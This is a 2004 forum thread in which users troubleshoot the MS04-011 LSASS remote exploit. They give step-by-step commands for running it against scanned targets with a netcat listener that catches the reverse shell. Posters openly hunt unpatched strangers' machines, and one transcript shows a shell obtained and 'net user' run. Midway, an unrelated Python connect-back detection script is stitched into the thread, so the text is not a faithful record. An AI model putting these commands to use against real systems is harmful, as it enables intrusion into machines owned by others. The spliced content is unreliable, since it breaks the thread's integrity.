predator2187
May 1 2004, 09:47 AM
| QUOTE (striker13 @ Apr 30 2004, 03:02 PM) |
Hello all, nice exploit, but I have a problem with nc. I've tested on many IPs... when I run the exploit it's good, but not for nc:
| QUOTE |
C:\lsass>lsass 0 ipifoundwithdsscan 666 myip
MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---
[*] Target: IP:ipifoundwithdsscan: OS: WinXP Professional [universal] lsass.exe
[*] Connecting to ipifoundwithdsscan:445 ... OK
[*] Attacking ... OK
Then I run nc:
C:\Documents and Settings\strike>cd..
C:\Documents and Settings>cd..
C:\>nc -l -p 666
and nothing, I'm not in c:\winnt\system32...
|
If you have an answer it would be great. Sorry for my bad English and thanks in advance. |
You have to run netcat before exploiting the target.
Qlimax
May 1 2004, 09:56 AM
| QUOTE (predator2187 @ May 1 2004, 09:47 AM) |
| QUOTE (striker13 @ Apr 30 2004, 03:02 PM) |
Hello all, nice exploit, but I have a problem with nc. I've tested on many IPs... when I run the exploit it's good, but not for nc:
| QUOTE |
C:\lsass>lsass 0 ipifoundwithdsscan 666 myip
MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---
[*] Target: IP:ipifoundwithdsscan: OS: WinXP Professional [universal] lsass.exe
[*] Connecting to ipifoundwithdsscan:445 ... OK
[*] Attacking ... OK
Then I run nc:
C:\Documents and Settings\strike>cd..
C:\Documents and Settings>cd..
C:\>nc -l -p 666
and nothing, I'm not in c:\winnt\system32...
|
If you have an answer it would be great. Sorry for my bad English and thanks in advance. |
You have to run netcat before exploiting the target. |
Run netcat like this:
nc -l -vv -p PORT
FIRST STEP:
Open a cmd.exe, browse to your netcat dir and type: nc.exe -l -p "the port that will open on your computer"
SECOND STEP:
Open another cmd.exe, browse to the exploit, and then type: "name of the exploit.exe" "0, 1, depending on the vic's OS" "vic's IP" "the port that you opened seconds before with nc.exe" "your IP"
If you're able to connect to his port 445 (most of the time it's OK), then you should get something coming in your first cmd.exe, the one in which you opened a port thanks to nc.exe.
I hope this helps "a bit" those who aren't used to "reverse" exploits.
ghost_c
May 1 2004, 02:26 PM
Thanks Macsou, I'll test it on my machines...
hakyoo
May 1 2004, 02:28 PM
Nothing special happening... same shellcode size 316 and ret value 1726 all the time...
Getting no shell... any more suggestions?
Paul
May 1 2004, 03:30 PM
Run your own thread if you have problems; this doesn't match the topic.
o0oKARo0o
May 21 2004, 05:48 PM
This exploit is almost dead, everyone's patched.
DMX2
May 21 2004, 05:58 PM
Still many shells here..
Happy hunting ;-)
arn0ld
May 21 2004, 06:00 PM
@o0oKARo0o
This exploit is alive and kickin'.
I'm still getting a few *good* vuln targets every day.
TRi
May 22 2004, 11:28 PM
Damn, guys, where are we? In Offtopic?
EXPLOiTED wants to know if there is a command-line scanner for LSASS, and I think it wasn't his intention to start another newbie-like "I don't get a shell, shall I reboot my PC to get it to work?" thread.
I mean guys, when you want some help, ask your mom, but when you want to contribute and help this guy, post something here! Else: RTFM!
My two cents...

PS: Sorry, no, I don't know a command-line scanner either, and I would like to know too if there is one.
asd10
May 23 2004, 08:47 AM
The link isn't working... can anyone give another one?
Thanks in advance,
AsD10
o0oKARo0o
May 26 2004, 08:31 PM
Check that site, they have some interesting stuff:
http://www.mosbatonline.com/hck/download.htm
jhd
May 26 2004, 10:22 PM
Now it's dead.
SeNe
May 28 2004, 01:03 AM
God damn, who did the translation at this site...
Seems like another AltaVista translate job.
EXPLOiTED
Jun 2 2004, 03:27 AM
Can we get back on topic... CMDLiNE SCANNER... I have Dsscan, I have scanned ports 139 and 445 (METALHEAD), that doesn't help... I don't feel like re-scanning those ranges once again when I find the ones with those ports open... METALHEAD... anywho... can we get back on topic, just in case someone reads this and says "OMFG Wtf are these morons babbling about" when they could be like "ooooh cmdline scanner ----> link" and I'd be happy.
yes
MERKiN
METALHEAD :-P
macca
Jun 29 2004, 10:51 AM
I've certainly not found a cmd line scanner anywhere, but I'm sure there is great need for one... I'll keep looking... can only hope!
Chizo
Jul 20 2004, 01:42 PM
Can anybody upload the Rlsasrv exploit from the first page of this thread for me please! Thanks! Or mail me: g33k@mail.ru
niko.noname
Aug 3 2004, 09:53 AM
First use a remote command-line scan tool like scan500 or sl.exe to make a simple port scan for port 445, then check the matching results locally via dsscan.
That's my way.
In the vuln results you may find ~10 percent which drop a shell, depending on the installed Windows version ;o)
Good luck.
Terminal
Aug 9 2004, 07:48 AM
Can anyone upload Rlsasrv.zip? I have another one that doesn't seem to work.
SeNSeMaNN
Aug 16 2004, 08:13 AM
What's the problem:
C:\lsass>RLsasrv.exe 0 attackip 666 myip
Create NULL session failed
shellcode size 316
Ret value = 58
o_O
iceman517
Aug 17 2004, 03:36 PM
lsass is shit, all systems are patched!!!!!
Antil
Aug 17 2004, 03:51 PM
| QUOTE (iceman517 @ Aug 17 2004, 03:36 PM) |
| lsass is shit, all systems are patched!!!!! |
you really think so?
-hal-
Sep 4 2004, 12:35 PM
cmd1:
c:\>exploit 0 192.168.0.2 4444 192.168.0.1
MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---
[*] Target: IP: 192.168.0.2: OS: WinXP Professional [universal] lsass.exe
[*] Connecting to 192.168.0.2:445 ... OK
[*] Attacking ... OK
-------------------------------------------------------------
cmd2:
nc -l -p 4444
-------------------------------------------------------------
Then what? Why does nothing happen in cmd2?
I have firewall turned off.
Terminal
Sep 4 2004, 12:56 PM
Put netcat to listen on the port first and then use the sploit. Also it's possible that the machine isn't vulnerable.
marco_maison@hotmail.com
Sep 4 2004, 01:19 PM
First:
| CODE |
C:\WINNT\system32>nc -vv -l -p 21
listening on [any] 21 ... |
Second:
| CODE |
C:\WINNT\system32>lsasrv 2 10.100.8.103 21 10.200.12.205
MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---
[*] Target: IP: 10.100.8.103: OS: Win2k Advanced Server [SP4] netrap.dll
[*] Connecting to 10.100.8.103:445 ... OK
[*] Attacking ... OK |
Third, got backshell:
| CODE |
C:\WINNT\system32>nc -vv -l -p 21
listening on [any] 21 ...
connect to [10.200.12.205] from xxx-xxx.xxx.net [10.100.8.100] 1526
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>net user net user
|
Do you have another problem?
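The sequence Qlimax laid out and marco_maison's transcript show the same traffic shape: the victim accepts a connection on port 445 and, a moment later, opens its own connection back to the listener port. The following is an added detection-side example, not code from this thread or from the exploit's author; the connection-log format is constructed, and the addresses mirror -hal-'s 192.168.0.x example with extra made-up hosts so that a non-matching case is also exercised.

```python
"""Flag the connect-back pattern described in the thread: a host accepts an
inbound TCP/445 connection and, shortly afterwards, opens an outbound
connection back to the same peer (the listener port the shell calls home to).

Added example for detection; the log format and addresses are constructed,
not taken from any real tool or from this thread's posts.
"""
from datetime import datetime, timedelta

# Constructed format: "<ISO time> <src_ip>:<src_port> -> <dst_ip>:<dst_port>"
SAMPLE_LOG = """\
2004-09-04T12:35:01 192.168.0.1:1041 -> 192.168.0.2:445
2004-09-04T12:35:02 192.168.0.2:1526 -> 192.168.0.1:4444
2004-09-04T12:36:10 10.0.0.5:2201 -> 192.168.0.7:445
2004-09-04T12:41:00 192.168.0.7:1030 -> 10.0.0.9:80
2004-09-04T12:50:00 192.168.0.3:1055 -> 10.0.0.5:445
2004-09-04T12:55:00 192.168.0.7:1031 -> 10.0.0.5:666
"""


def parse_line(line):
    """Split one constructed log line into (time, src_ip, src_port, dst_ip, dst_port)."""
    ts, src, _arrow, dst = line.split()
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return datetime.fromisoformat(ts), src_ip, int(src_port), dst_ip, int(dst_port)


def find_connect_backs(log_text, window_seconds=300):
    """Return (victim, peer, port) for each outbound connection that follows an
    inbound 445 connection from the same peer within window_seconds.
    A host that was scanned on 445 and later browses elsewhere is not flagged."""
    window = timedelta(seconds=window_seconds)
    last_smb = {}  # (victim, peer) -> time of the latest inbound 445 connection
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, _sport, dst, dport = parse_line(line)
        if dport == 445:
            last_smb[(dst, src)] = ts       # peer 'src' reached victim 'dst' on 445
            continue
        seen_at = last_smb.get((src, dst))  # did 'dst' hit 'src' on 445 before?
        if seen_at is not None and ts - seen_at <= window:
            hits.append((src, dst, dport))
    return hits


if __name__ == "__main__":
    for victim, peer, port in find_connect_backs(SAMPLE_LOG):
        print(f"possible connect-back shell: {victim} -> {peer}:{port}")
```

Widening the window picks up the slower 192.168.0.7 to 10.0.0.5:666 case as well, so the window length is the tuning knob between sensitivity and noise.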
-hal-
Sep 4 2004, 01:33 PM
CMD1:
C:\>nc -vv -l -p 21
listening on [any] 21 ...
-----------------------------------------------------------------------
CMD2:
C:\>exploit 2 192.168.0.2 21 192.168.0.1
MS04011 Lsasrv.dll RPC buffer overflow remote exploit v0.1
--- Coded by .::[ houseofdabus ]::. ---
[*] Target: IP: 192.168.0.2: OS: Win2k Advanced Server [SP4] netrap.dll
[*] Connecting to 192.168.0.2:445 ... OK
[*] Attacking ... OK
C:\>
-----------------------------------------------------------------------
CMD3:
C:\>nc -vv -l -p 21
listening on [any] 21 ...
-----------------------------------------------------------------------
Still no response...
IcedOut3E
Sep 5 2004, 04:12 AM
Just gotta keep trying, you'll get one.
I thought I was doing it wrong at first because I wasn't getting shells, but after a while I got one that worked.
Don't forget about the -t option that will check the OS. Then you can choose according to the OS.
Laters...
IcedOut3E
Sep 5 2004, 04:20 AM
Also this might be of help...
Searching around I find this:
| QUOTE |
| did you learn about routers and MAC addresses? well, if they're running a router no... this needs NETBIOS ports to be opened.. routers don't run netbios.. so unless you can get the port 445 to be passed through on the router for a certain computer (have to know internal IP for specific ones), i really don't think so |